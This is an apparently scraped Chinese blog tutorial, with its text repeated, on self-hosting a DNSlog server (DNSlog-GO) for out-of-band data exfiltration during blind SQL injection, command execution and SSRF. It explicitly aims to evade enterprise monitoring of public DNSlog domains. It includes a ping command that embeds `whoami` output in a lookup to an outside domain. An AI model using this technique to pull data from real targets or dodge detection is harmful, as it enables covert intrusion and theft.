自建DNSlog服务器

博主： Kim同学
发布时间：2023 年 07 月 14 日
255 次浏览
暂无评论
2749字数
分类：工具推荐

# DNSlog简介

在某些情况下，无法利用漏洞获得回显。但是，如果目标可以发送DNS请求，则可以通过DNS log方式将想获得的数据外带出来。

DNS log常用于以下情况：

* SQL盲注
* 无回显的命令执行
* 无回显的SSRF

网上公开提供dnslog服务有很多，比如dnslog.cn、知道创宇、三叶草等等，但是这些提供的域名是固定的，现在一些比较大型的企业已经把这些域名也加入到监控范围之中了。

如果自建一个dnslog服务，就能很好的规避这种情况。

# 需要准备

1. 一个阿里云的域名
2. VPS服务器一台

# 域名解析

在bigwulong.cn中添加添加一个A记录与一个NS记录。其中A记录指向服务器IP地址，NS记录指向A记录的域名地址

![阿里云的万网解析设置](https://resource.if010.com/dnslog_install_01.png)

![解析过程](https://resource.if010.com/dnslog_install_02.png)

# 获取方式

DNSlog-GO使用golang编写的dnslog服务端，自带WEB界面，web可自定义编辑修改美化。兼容Linux，MACOS，Windows等系统。各平台直接下载运行，无需安装依赖，这里以Linux作为示例。

Github地址：[https://github.com/lanyi1998/DNSlog-GO/releases/](https://github.com/lanyi1998/DNSlog-GO/releases/)

本站下载地址（Linux DNSlog-GO 1.5.6版本）：[https://resource.if010.com/DNSlog-GO/dnslog-linux.zip](https://resource.if010.com/DNSlog-GO/dnslog-linux.zip)

本站下载地址（MacOS DNSlog-GO 1.5.6版本）：[https://resource.if010.com/DNSlog-GO/dnslog-macos.zip](https://resource.if010.com/DNSlog-GO/dnslog-macos.zip)

本站下载地址（Windows DNSlog-GO 1.5.6版本）：[https://resource.if010.com/DNSlog-GO/dnslog-windows.zip](https://resource.if010.com/DNSlog-GO/dnslog-windows.zip)

# 运行

修改默认的token

```bash
[root@localhost ~]# vim config.yaml

HTTP:
  port: 8000
  #{"token":"用户对应子域名"}
  user: { "123456": "logdns" }
  consoleDisable: false
Dns:
  domain: bigwulong.cn
```

启动

```bash
[root@localhost ~]# ./dnslog-linux &
2023/07/14 07:09:39 Http Listing Start...
2023/07/14 07:09:39 Http address: http://0.0.0.0:8000
2023/07/14 07:09:39 DNS Listing Start...
```

查看进程和监听情况

```bash
[root@kr-seoul ~]# ps aux | grep dnslog
root      3275  0.0  0.6 714196  6160 pts/0    Sl   07:09   0:00 ./dnslog-linux
root      3296  0.0  0.0 112808   976 pts/0    R+   07:11   0:00 grep --color=auto dnslog

[root@kr-seoul ~]# netstat -tnlpu | grep -E '8000|53'
tcp6       0      0 :::8000                 :::*                    LISTEN      3275/./dnslog-linux 
udp6       0      0 :::53                   :::*                                3275/./dnslog-linux 
```

# 测试

Web页面访问测试，<span style='color:red'>需要输入token，这里的token就是config.yaml设置的值</span>

![Web页面](https://resource.if010.com/dnslog_install_03.png)

点击复制随机子域名获取到 spmkj.dnslog.bigwulong.cn

使用ping命令

```bash
[root@localhost ~]# ping `whoami`.spmkj.dnslog.bigwulong.cn -c 1
PING root.spmkj.dnslog.bigwulong.cn (127.0.0.1) 56(84) bytes of data.
64 bytes from kr-seoul.if010.com (127.0.0.1): icmp_seq=1 ttl=64 time=0.023 ms

root.spmkj.dnslog.bigwulong.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.023/0.023/0.023/0.000 ms
```

可以看到回显结果

![回显结果](https://resource.if010.com/dnslog_install_04.png)

最后修改：2023 年 07 月 14 日

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

打卡

私密评论

名称 *

🎲

邮箱 *

地址

百度云学习资源共享
浏览次数: 33096
OpenSSH通用后门设置
浏览次数: 16304
个人笔记备忘录
浏览次数: 14601
Soft Keys---[密钥]
浏览次数: 7828
MySQL 查找并删除重复行
浏览次数: 7184

妞妞
好心人
陈天启
谢谢分享
aaa
帮助非常大，最近在学习openstack
Aming
学习学习
看透一切的女孩
6

自建DNSlog服务器

Kim同学 • 2023 年 07 月 14 日

# DNSlog简介

在某些情况下，无法利用漏洞获得回显。但是，如果目标可以发送DNS请求，则可以通过DNS log方式将想获得的数据外带出来。

DNS log常用于以下情况：

* SQL盲注
* 无回显的命令执行
* 无回显的SSRF

如果自建一个dnslog服务，就能很好的规避这种情况。

# 需要准备

1. 一个阿里云的域名
2. VPS服务器一台

# 域名解析

在bigwulong.cn中添加添加一个A记录与一个NS记录。其中A记录指向服务器IP地址，NS记录指向A记录的域名地址

![阿里云的万网解析设置](https://resource.if010.com/dnslog_install_01.png)

![解析过程](https://resource.if010.com/dnslog_install_02.png)

# 获取方式

Github地址：[https://github.com/lanyi1998/DNSlog-GO/releases/](https://github.com/lanyi1998/DNSlog-GO/releases/)

本站下载地址（Linux DNSlog-GO 1.5.6版本）：[https://resource.if010.com/DNSlog-GO/dnslog-linux.zip](https://resource.if010.com/DNSlog-GO/dnslog-linux.zip)

本站下载地址（MacOS DNSlog-GO 1.5.6版本）：[https://resource.if010.com/DNSlog-GO/dnslog-macos.zip](https://resource.if010.com/DNSlog-GO/dnslog-macos.zip)

本站下载地址（Windows DNSlog-GO 1.5.6版本）：[https://resource.if010.com/DNSlog-GO/dnslog-windows.zip](https://resource.if010.com/DNSlog-GO/dnslog-windows.zip)

# 运行

修改默认的token

```bash
[root@localhost ~]# vim config.yaml

HTTP:
  port: 8000
  #{"token":"用户对应子域名"}
  user: { "123456": "logdns" }
  consoleDisable: false
Dns:
  domain: bigwulong.cn
```

启动

```bash
[root@localhost ~]# ./dnslog-linux &
2023/07/14 07:09:39 Http Listing Start...
2023/07/14 07:09:39 Http address: http://0.0.0.0:8000
2023/07/14 07:09:39 DNS Listing Start...
```

查看进程和监听情况

# 测试

Web页面访问测试，<span style='color:red'>需要输入token，这里的token就是config.yaml设置的值</span>

![Web页面](https://resource.if010.com/dnslog_install_03.png)

点击复制随机子域名获取到 spmkj.dnslog.bigwulong.cn

使用ping命令

root.spmkj.dnslog.bigwulong.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.023/0.023/0.023/0.000 ms
```

可以看到回显结果

![回显结果](https://resource.if010.com/dnslog_install_04.png)

自建DNSlog服务器

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

百度云学习资源共享

OpenSSH通用后门设置

个人笔记备忘录

Soft Keys---[密钥]

MySQL 查找并删除重复行

MySQL利用binlog日志恢复记录

Linux连接OpenVPN

关于Java的IO流开发

MySQL 数据加密

Linux运维比较常用的一些脚本

自建DNSlog服务器

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

自建DNSlog服务器

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款